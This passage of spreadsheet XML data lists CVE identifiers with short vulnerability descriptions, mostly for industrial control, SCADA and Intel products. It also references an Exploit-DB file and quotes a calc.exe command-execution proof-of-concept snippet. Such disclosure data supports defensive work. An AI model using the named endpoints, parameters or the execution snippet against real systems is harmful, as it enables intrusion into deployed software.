    <t>The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1).</t>
  </si>
  <si>
    <t>CVE-2021-32944</t>
  </si>
  <si>
    <t>A use-after-free issue exists in the DGN file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a memory corruption or arbitrary code execution, allowing attackers to cause a denial-of-service condition or execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32945</t>
  </si>
  <si>
    <t>An attacker could decipher the encryption and gain access to MDT AutoSave versions prior to v6.02.06.</t>
  </si>
  <si>
    <t>CVE-2021-32946</t>
  </si>
  <si>
    <t>An improper check for unusual or exceptional conditions issue exists within the parsing DGN files from Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of the user-supplied data. This may result in several of out-of-bounds problems and allow attackers to cause a denial-of-service condition or execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32947</t>
  </si>
  <si>
    <t>FATEK Automation FvDesigner, Versions 1.5.88 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32948</t>
  </si>
  <si>
    <t>An out-of-bounds write issue exists in the DWG file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32949</t>
  </si>
  <si>
    <t>An attacker could utilize a function in MDT AutoSave versions prior to v6.02.06 that permits changing a designated path to another path and traversing the directory, allowing the replacement of an existing file with a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-32950</t>
  </si>
  <si>
    <t>An out-of-bounds read issue exists within the parsing of DXF files in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allows attackers to cause a denial-of-service condition or read sensitive information from memory locations.</t>
  </si>
  <si>
    <t>CVE-2021-32951</t>
  </si>
  <si>
    <t>WebAccess/NMS (Versions prior to v3.0.3_Build6299) has an improper authentication vulnerability, which may allow unauthorized users to view resources monitored and controlled by the WebAccess/NMS, as well as IP addresses and names of all the devices managed via WebAccess/NMS.</t>
  </si>
  <si>
    <t>CVE-2021-32952</t>
  </si>
  <si>
    <t>An out-of-bounds write issue exists in the DGN file-reading procedure in the Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32953</t>
  </si>
  <si>
    <t>An attacker could utilize SQL commands to create a new user MDT AutoSave versions prior to v6.02.06 and update the user’s permissions, granting the attacker the ability to login.</t>
  </si>
  <si>
    <t>CVE-2021-32954</t>
  </si>
  <si>
    <t>Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to a directory traversal, which may allow an attacker to remotely read arbitrary files on the file system.</t>
  </si>
  <si>
    <t>CVE-2021-32955</t>
  </si>
  <si>
    <t>Delta Electronics DIAEnergie Version 1.7.5 and prior allows unrestricted file uploads, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-32956</t>
  </si>
  <si>
    <t>Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to redirection, which may allow an attacker to send a maliciously crafted URL that could result in redirecting a user to a malicious webpage.</t>
  </si>
  <si>
    <t>CVE-2021-32957</t>
  </si>
  <si>
    <t>A function in MDT AutoSave versions prior to v6.02.06 is used to retrieve system information for a specific process, and this information collection executes multiple commands and summarizes the information into an XML. This function and subsequent process gives full path to the executable and is therefore vulnerable to binary hijacking.</t>
  </si>
  <si>
    <t>CVE-2021-32958</t>
  </si>
  <si>
    <t>Successful exploitation of this vulnerability on Claroty Secure Remote Access (SRA) Site versions 3.0 through 3.2 allows an attacker with local command line interface access to gain the secret key, subsequently allowing them to generate valid session tokens for the web user interface (UI). With access to the web UI an attacker can access assets managed by the SRA installation and could compromise the installation.</t>
  </si>
  <si>
    <t>CVE-2021-32959</t>
  </si>
  <si>
    <t>Heap-based buffer overflow in SuiteLink server while processing commands 0x05/0x06</t>
  </si>
  <si>
    <t>CVE-2021-32960</t>
  </si>
  <si>
    <t>Rockwell Automation FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine.</t>
  </si>
  <si>
    <t>CVE-2021-32961</t>
  </si>
  <si>
    <t>A getfile function in MDT AutoSave versions prior to v6.02.06 enables a user to supply an optional parameter, resulting in the processing of a request in a special manner. This can result in the execution of an unzip command and place a malicious .exe file in one of the locations the function looks for and get execution capabilities.</t>
  </si>
  <si>
    <t>CVE-2021-32962</t>
  </si>
  <si>
    <t>The AGG Software Web Server version 4.0.40.1014 and prior is vulnerable to cross-site scripting, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32963</t>
  </si>
  <si>
    <t>Null pointer dereference in SuiteLink server while processing commands 0x03/0x10</t>
  </si>
  <si>
    <t>CVE-2021-32964</t>
  </si>
  <si>
    <t>The AGG Software Web Server version 4.0.40.1014 and prior is vulnerable to a path traversal attack, which may allow an attacker to read arbitrary files from the file system.</t>
  </si>
  <si>
    <t>CVE-2021-32965</t>
  </si>
  <si>
    <t>Delta Electronics DIAScreen versions prior to 1.1.0 are vulnerable to type confusion, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32966</t>
  </si>
  <si>
    <t>Philips Interoperability Solution XDS versions 2.5 through 3.11 and 2018-1 through 2021-1 are vulnerable to clear text transmission of sensitive information when configured to use LDAP via TLS and where the domain controller returns LDAP referrals, which may allow an attacker to remotely read LDAP system credentials.</t>
  </si>
  <si>
    <t>CVE-2021-32967</t>
  </si>
  <si>
    <t>Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2021-32968</t>
  </si>
  <si>
    <t>Two buffer overflows in the built-in web server in Moxa NPort IAW5000A-I/O Series firmware version 2.2 or earlier may allow a remote attacker to cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-32969</t>
  </si>
  <si>
    <t>Delta Electronics DIAScreen versions prior to 1.1.0 are vulnerable to an out-of-bounds write condition, which may result in a system crash or allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-3297</t>
  </si>
  <si>
    <t>On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.</t>
  </si>
  <si>
    <t>CVE-2021-32970</t>
  </si>
  <si>
    <t>Data can be copied without validation in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier, which may allow a remote attacker to cause denial-of-service conditions.</t>
  </si>
  <si>
    <t>CVE-2021-32971</t>
  </si>
  <si>
    <t>Null pointer dereference in SuiteLink server while processing command 0x07</t>
  </si>
  <si>
    <t>CVE-2021-32972</t>
  </si>
  <si>
    <t>Panasonic FPWIN Pro, all Versions 7.5.1.1 and prior, allows an attacker to craft a project file specifying a URI that causes the XML parser to access the URI and embed the contents, which may allow the attacker to disclose information that is accessible in the context of the user executing software.</t>
  </si>
  <si>
    <t>CVE-2021-32974</t>
  </si>
  <si>
    <t>Improper input validation in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier may allow a remote attacker to execute commands.</t>
  </si>
  <si>
    <t>CVE-2021-32975</t>
  </si>
  <si>
    <t>Cscape (All Versions prior to 9.90 SP5) lacks proper validation of user-supplied data when parsing project files. This could lead to an out-of-bounds read. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32976</t>
  </si>
  <si>
    <t>Five buffer overflows in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier may allow a remote attacker to initiate a denial-of-service attack and execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32977</t>
  </si>
  <si>
    <t>AVEVA System Platform versions 2017 through 2020 R2 P01 does not verify, or incorrectly verifies, the cryptographic signature for data.</t>
  </si>
  <si>
    <t>CVE-2021-32978</t>
  </si>
  <si>
    <t>The programming protocol allows for a previously entered password and lock state to be read by an attacker. If the previously entered password was successful, the attacker can then use the password to unlock Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00.</t>
  </si>
  <si>
    <t>CVE-2021-32979</t>
  </si>
  <si>
    <t>Null pointer dereference in SuiteLink server while processing commands 0x04/0x0a</t>
  </si>
  <si>
    <t>CVE-2021-3298</t>
  </si>
  <si>
    <t>Collabtive 3.1 allows XSS when an authenticated user enters an XSS payload into the address section of the profile edit page, aka the manageuser.php?action=edit address1 parameter.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49468.txt</t>
  </si>
  <si>
    <t>Collabtive 3.1 - 'address' Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2021-32980</t>
  </si>
  <si>
    <t>Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 does not protect against additional software programming connections. An attacker can connect to the PLC while an existing connection is already active.</t>
  </si>
  <si>
    <t>CVE-2021-32981</t>
  </si>
  <si>
    <t>AVEVA System Platform versions 2017 through 2020 R2 P01 uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.</t>
  </si>
  <si>
    <t>CVE-2021-32982</t>
  </si>
  <si>
    <t>Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 passwords are sent as plaintext during unlocking and project transfers. An attacker who has network visibility can observe the password exchange.</t>
  </si>
  <si>
    <t>CVE-2021-32983</t>
  </si>
  <si>
    <t>A Blind SQL injection vulnerability exists in the /DataHandler/Handler_CFG.ashx endpoint of Delta Electronics DIAEnergie Version 1.7.5 and prior. The application does not properly validate the user-controlled value supplied through the parameter keyword before using it as part of an SQL query. A remote, unauthenticated attacker can exploit this issue to execute arbitrary code in the context of NT SERVICE\MSSQLSERVER.</t>
  </si>
  <si>
    <t>CVE-2021-32984</t>
  </si>
  <si>
    <t>All programming connections receive the same unlocked privileges, which can result in a privilege escalation. During the time Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 is unlocked by an authorized user, an attacker can connect to the PLC and read the project without authorization.</t>
  </si>
  <si>
    <t>CVE-2021-32985</t>
  </si>
  <si>
    <t>AVEVA System Platform versions 2017 through 2020 R2 P01 does not properly verify that the source of data or communication is valid.</t>
  </si>
  <si>
    <t>CVE-2021-32986</t>
  </si>
  <si>
    <t>After Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 is unlocked by an authorized user, the unlocked state does not timeout. If the programming software is interrupted, the PLC remains unlocked. All subsequent programming connections are allowed without authorization. The PLC is only relocked by a power cycle, or when the programming software disconnects correctly.</t>
  </si>
  <si>
    <t>CVE-2021-32987</t>
  </si>
  <si>
    <t>Null pointer dereference in SuiteLink server while processing command 0x0b</t>
  </si>
  <si>
    <t>CVE-2021-32988</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder Versions 3.30 and prior are vulnerable to an out-of-bounds write, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32989</t>
  </si>
  <si>
    <t>When a non-existent resource is requested, the LCDS LAquis SCADA application (version 4.3.1.1011 and prior) returns error messages which may allow reflected cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2021-32990</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder Versions 3.30 and prior are vulnerable to an out-of-bounds read, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32991</t>
  </si>
  <si>
    <t>Delta Electronics DIAEnergie Version 1.7.5 and prior is vulnerable to cross-site request forgery, which may allow an attacker to cause a user to carry out an action unintentionally.</t>
  </si>
  <si>
    <t>CVE-2021-32992</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder Versions 3.30 and prior do not properly restrict operations within the bounds of a memory buffer, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-32993</t>
  </si>
  <si>
    <t>IntelliBridge EC 40 and 60 Hub (C.00.04 and prior) contains hard-coded credentials, such as a password or a cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.</t>
  </si>
  <si>
    <t>CVE-2021-32994</t>
  </si>
  <si>
    <t>Softing OPC UA C++ SDK (Software Development Kit) versions from 5.59 to 5.64 exported library functions don't properly validate received extension objects, which may allow an attacker to crash the software by sending a variety of specially crafted packets to access several unexpected memory locations.</t>
  </si>
  <si>
    <t>CVE-2021-32995</t>
  </si>
  <si>
    <t>Cscape (All Versions prior to 9.90 SP5) lacks proper validation of user-supplied data when parsing project files. This could lead to an out-of-bounds write. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32996</t>
  </si>
  <si>
    <t>The FANUC R-30iA and R-30iB series controllers are vulnerable to integer coercion errors, which cause the device to crash. A restart is required.</t>
  </si>
  <si>
    <t>CVE-2021-32997</t>
  </si>
  <si>
    <t>The affected Baker Hughes Bentley Nevada products (3500 System 1 6.x, Part No. 3060/00 versions 6.98 and prior, 3500 System 1, Part No. 3071/xx &amp; 3072/xx versions 21.1 HF1 and prior, 3500 Rack Configuration, Part No. 129133-01 versions 6.4 and prior, and 3500/22M Firmware, Part No. 288055-01 versions 5.05 and prior) utilize a weak encryption algorithm for storage and transmission of sensitive data, which may allow an attacker to more easily obtain credentials used for access.</t>
  </si>
  <si>
    <t>CVE-2021-32998</t>
  </si>
  <si>
    <t>The FANUC R-30iA and R-30iB series controllers are vulnerable to an out-of-bounds write, which may allow an attacker to remotely execute arbitrary code. INIT START/restore from backup required.</t>
  </si>
  <si>
    <t>CVE-2021-32999</t>
  </si>
  <si>
    <t>Improper handling of exceptional conditions in SuiteLink server while processing command 0x01</t>
  </si>
  <si>
    <t>CVE-2021-33000</t>
  </si>
  <si>
    <t>Parsing a maliciously crafted project file may cause a heap-based buffer overflow, which may allow an attacker to perform arbitrary code execution. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior).</t>
  </si>
  <si>
    <t>CVE-2021-33001</t>
  </si>
  <si>
    <t>xArrow SCADA versions 7.2 and prior is vulnerable to cross-site scripting due to parameter ‘bdate’ of the resource xhisvalue.htm, which may allow an unauthorized attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33002</t>
  </si>
  <si>
    <t>Opening a maliciously crafted project file may cause an out-of-bounds write, which may allow an attacker to execute arbitrary code. User interaction is require on the WebAccess HMI Designer (versions 2.1.9.95 and prior).</t>
  </si>
  <si>
    <t>CVE-2021-33003</t>
  </si>
  <si>
    <t>Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to retrieve passwords in cleartext due to a weak hashing algorithm.</t>
  </si>
  <si>
    <t>CVE-2021-33004</t>
  </si>
  <si>
    <t>The affected product is vulnerable to memory corruption condition due to lack of proper validation of user supplied files, which may allow an attacker to execute arbitrary code. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior).</t>
  </si>
  <si>
    <t>CVE-2021-33005</t>
  </si>
  <si>
    <t>mySCADA myPRO versions prior to 8.20.0 allows an unauthenticated remote attacker to upload arbitrary files to arbitrary directories.</t>
  </si>
  <si>
    <t>CVE-2021-33007</t>
  </si>
  <si>
    <t>A heap-based buffer overflow in Delta Electronics TPEditor: v1.98.06 and prior may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33008</t>
  </si>
  <si>
    <t>AVEVA System Platform versions 2017 through 2020 R2 P01 does not perform any authentication for functionality that requires a provable user identity.</t>
  </si>
  <si>
    <t>CVE-2021-33009</t>
  </si>
  <si>
    <t>mySCADA myPRO versions prior to 8.20.0 allows an unauthenticated remote attacker to upload arbitrary files to the file system.</t>
  </si>
  <si>
    <t>CVE-2021-33010</t>
  </si>
  <si>
    <t>An exception is thrown from a function in AVEVA System Platform versions 2017 through 2020 R2 P01, but it is not caught, which may cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-33011</t>
  </si>
  <si>
    <t>All versions of the afffected TOYOPUC-PC10 Series,TOYOPUC-Plus Series,TOYOPUC-PC3J/PC2J Series, TOYOPUC-Nano Series products may not be able to properly process an ICMP flood, which may allow an attacker to deny Ethernet communications between affected devices.</t>
  </si>
  <si>
    <t>CVE-2021-33012</t>
  </si>
  <si>
    <t>Rockwell Automation MicroLogix 1100, all versions, allows a remote, unauthenticated attacker sending specially crafted commands to cause the PLC to fault when the controller is switched to RUN mode, which results in a denial-of-service condition. If successfully exploited, this vulnerability will cause the controller to fault whenever the controller is switched to RUN mode.</t>
  </si>
  <si>
    <t>CVE-2021-33013</t>
  </si>
  <si>
    <t>mySCADA myPRO versions prior to 8.20.0 does not restrict unauthorized read access to sensitive system information.</t>
  </si>
  <si>
    <t>CVE-2021-33014</t>
  </si>
  <si>
    <t>An attacker can gain VxWorks Shell after login due to hard-coded credentials on a KUKA KR C4 control software for versions prior to 8.7 or any product running KSS.</t>
  </si>
  <si>
    <t>CVE-2021-33015</t>
  </si>
  <si>
    <t>Cscape (All Versions prior to 9.90 SP5) lacks proper validation of user-supplied data when parsing project files. This could lead to an out-of-bounds write via an uninitialized pointer. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-33016</t>
  </si>
  <si>
    <t>An attacker can gain full access (read/write/delete) to sensitive folders due to hard-coded credentials on KUKA KR C4 control software for versions prior to 8.7 or any product running KSS.</t>
  </si>
  <si>
    <t>CVE-2021-33017</t>
  </si>
  <si>
    <t>The standard access path of the IntelliBridge EC 40 and 60 Hub (C.00.04 and prior) requires authentication, but the product has an alternate path or channel that does not require authentication.</t>
  </si>
  <si>
    <t>CVE-2021-33018</t>
  </si>
  <si>
    <t>The use of a broken or risky cryptographic algorithm in Philips Vue PACS versions 12.2.x.x and prior is an unnecessary risk that may result in the exposure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-33019</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability in Delta Electronics DOPSoft Version 4.00.11 and prior may be exploited by processing a specially crafted project file, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33020</t>
  </si>
  <si>
    <t>Philips Vue PACS versions 12.2.x.x and prior uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.</t>
  </si>
  <si>
    <t>CVE-2021-33021</t>
  </si>
  <si>
    <t>xArrow SCADA versions 7.2 and prior is vulnerable to cross-site scripting due to parameter ‘edate’ of the resource xhisalarm.htm, which may allow an unauthorized attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33022</t>
  </si>
  <si>
    <t>Philips Vue PACS versions 12.2.x.x and prior transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.</t>
  </si>
  <si>
    <t>CVE-2021-33023</t>
  </si>
  <si>
    <t>Advantech WebAccess versions 9.02 and prior are vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-33024</t>
  </si>
  <si>
    <t>Philips Vue PACS versions 12.2.x.x and prior transmits or stores authentication credentials, but it uses an insecure method susceptible to unauthorized interception and/or retrieval.</t>
  </si>
  <si>
    <t>CVE-2021-33025</t>
  </si>
  <si>
    <t>xArrow SCADA versions 7.2 and prior permits unvalidated registry keys to be run with application-level privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33026</t>
  </si>
  <si>
    <t>** DISPUTED ** The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision.</t>
  </si>
  <si>
    <t>CVE-2021-33027</t>
  </si>
  <si>
    <t>Sylabs Singularity Enterprise through 1.6.2 has Insufficient Entropy in a nonce.</t>
  </si>
  <si>
    <t>CVE-2021-33031</t>
  </si>
  <si>
    <t>In LabCup before &lt;v2_next_18022, it is possible to use the save API to perform unauthorized actions for users without access to user management in order to, after successful exploitation, gain access to a victim's account. A user without the user-management privilege can change another user's email address if the attacker knows details of the victim such as the exact roles and group roles, ID, and remote authentication ID settings. These must be sent in a modified save API request. It was fixed in 6.3.0.03.</t>
  </si>
  <si>
    <t>CVE-2021-33032</t>
  </si>
  <si>
    <t>A Remote Code Execution (RCE) vulnerability in the WebUI component of the eQ-3 HomeMatic CCU2 firmware up to and including version 2.57.5 and CCU3 firmware up to and including version 3.57.5 allows remote unauthenticated attackers to execute system commands as root via a simple HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-33033</t>
  </si>
  <si>
    <t>The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads to writing an arbitrary value.</t>
  </si>
  <si>
    <t>CVE-2021-33034</t>
  </si>
  <si>
    <t>In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value.</t>
  </si>
  <si>
    <t>CVE-2021-33035</t>
  </si>
  <si>
    <t>Apache OpenOffice opens dBase/DBF documents and shows the contents as spreadsheets. DBF are database files with data organized in fields. When reading DBF data the size of certain fields is not checked: the data is just copied into local variables. A carefully crafted document could overflow the allocated space, leading to the execution of arbitrary code by altering the contents of the program stack. This issue affects Apache OpenOffice up to and including version 4.1.10</t>
  </si>
  <si>
    <t>CVE-2021-33036</t>
  </si>
  <si>
    <t>In Apache Hadoop 2.2.0 to 2.10.1, 3.0.0-alpha1 to 3.1.4, 3.2.0 to 3.2.2, and 3.3.0 to 3.3.1, a user who can escalate to yarn user can possibly run arbitrary commands as root user. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.</t>
  </si>
  <si>
    <t>CVE-2021-33037</t>
  </si>
  <si>
    <t>Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.</t>
  </si>
  <si>
    <t>CVE-2021-33038</t>
  </si>
  <si>
    <t>An issue was discovered in management/commands/hyperkitty_import.py in HyperKitty through 1.3.4. When importing a private mailing list's archives, these archives are publicly visible for the duration of the import. For example, sensitive information might be available on the web for an hour during a large migration from Mailman 2 to Mailman 3.</t>
  </si>
  <si>
    <t>CVE-2021-3304</t>
  </si>
  <si>
    <t>Sagemcom F@ST 3686 v2 3.495 devices have a buffer overflow via a long sessionKey to the goform/login URI.</t>
  </si>
  <si>
    <t>CVE-2021-33040</t>
  </si>
  <si>
    <t>managers/views/iframe.js in FuturePress EPub.js before 0.3.89 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-33041</t>
  </si>
  <si>
    <t>vmd through 1.34.0 allows 'div class="markdown-body"' XSS, as demonstrated by Electron remote code execution via require('child_process').execSync('calc.exe') on Windows and a similar attack on macOS.</t>
  </si>
  <si>
    <t>CVE-2021-33044</t>
  </si>
  <si>
    <t>The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.</t>
  </si>
  <si>
    <t>CVE-2021-33045</t>
  </si>
  <si>
    <t>CVE-2021-33046</t>
  </si>
  <si>
    <t>Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.</t>
  </si>
  <si>
    <t>CVE-2021-3305</t>
  </si>
  <si>
    <t>Beijing Feishu Technology Co., Ltd Feishu v3.40.3 was discovered to contain an untrusted search path vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33054</t>
  </si>
  <si>
    <t>SOGo 2.x before 2.4.1 and 3.x through 5.x before 5.1.1 does not validate the signatures of any SAML assertions it receives. Any actor with network access to the deployment could impersonate users when SAML is the authentication method. (Only versions after 2.0.5a are affected.)</t>
  </si>
  <si>
    <t>CVE-2021-33055</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus through 6102 allows unauthenticated remote code execution in non-English editions.</t>
  </si>
  <si>
    <t>CVE-2021-33056</t>
  </si>
  <si>
    <t>Belledonne Belle-sip before 4.5.20, as used in Linphone and other products, can crash via an invalid From header in a SIP message.</t>
  </si>
  <si>
    <t>CVE-2021-33057</t>
  </si>
  <si>
    <t>The QQ application 8.7.1 for Android and iOS does not enforce the permission requirements (e.g., android.permission.ACCESS_FINE_LOCATION) for determining the device's physical location. An attacker can use qq.createMapContext to create a MapContext object, use MapContext.moveToLocation to move the center of the map to the device's location, and use MapContext.getCenterLocation to get the latitude and longitude of the current map center.</t>
  </si>
  <si>
    <t>CVE-2021-33058</t>
  </si>
  <si>
    <t>Improper access control in the installer Intel(R)Administrative Tools for Intel(R) Network Adaptersfor Windowsbefore version 1.4.0.21 may allow an unauthenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33059</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Administrative Tools for Intel(R) Network Adapters driver for Windows before version 1.4.0.15, may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33060</t>
  </si>
  <si>
    <t>Out-of-bounds write in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33061</t>
  </si>
  <si>
    <t>Insufficient control flow management for the Intel(R) 82599 Ethernet Controllers and Adapters may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33062</t>
  </si>
  <si>
    <t>Incorrect default permissions in the software installer for the Intel(R) VTune(TM) Profiler before version 2021.3.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33063</t>
  </si>
  <si>
    <t>Uncontrolled search path in the Intel(R) RealSense(TM) D400 Series UWP driver for Windows 10 before version 6.1.160.22 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33064</t>
  </si>
  <si>
    <t>Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33068</t>
  </si>
  <si>
    <t>Null pointer dereference in subsystem for Intel(R) AMT before versions 15.0.35 may allow an authenticated user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2021-33069</t>
  </si>
  <si>
    <t>Improper resource shutdown or release in firmware for some Intel(R) SSD, Intel(R) SSD DC, Intel(R) Optane(TM) SSD and Intel(R) Optane(TM) SSD DC may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33071</t>
  </si>
  <si>
    <t>Incorrect default permissions in the installer for the Intel(R) oneAPI Rendering Toolkit before version 2021.2 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33073</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in the Intel(R) Distribution of OpenVINOâ„¢ Toolkit before version 2021.4 may allow an unauthenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33074</t>
  </si>
  <si>
    <t>Protection mechanism failure in firmware for some Intel(R) SSD, Intel(R) SSD DC and Intel(R) Optane(TM) SSD Products may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33075</t>
  </si>
  <si>
    <t>Race condition in firmware for some Intel(R) Optane(TM) SSD, Intel(R) Optane(TM) SSD DC and Intel(R) SSD DC Products may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33076</t>
  </si>
  <si>
    <t>Improper authentication in firmware for some Intel(R) SSD DC Products may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33077</t>
  </si>
  <si>
    <t>Insufficient control flow management in firmware for some Intel(R) SSD, Intel(R) Optane(TM) SSD and Intel(R) SSD DC Products may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33078</t>
  </si>
  <si>
    <t>Race condition within a thread in firmware for some Intel(R) Optane(TM) SSD and Intel(R) SSD DC Products may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33079</t>
  </si>
  <si>
    <t>Protection mechanism failure in firmware for some Intel(R) SSD DC Products may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3308</t>
  </si>
  <si>
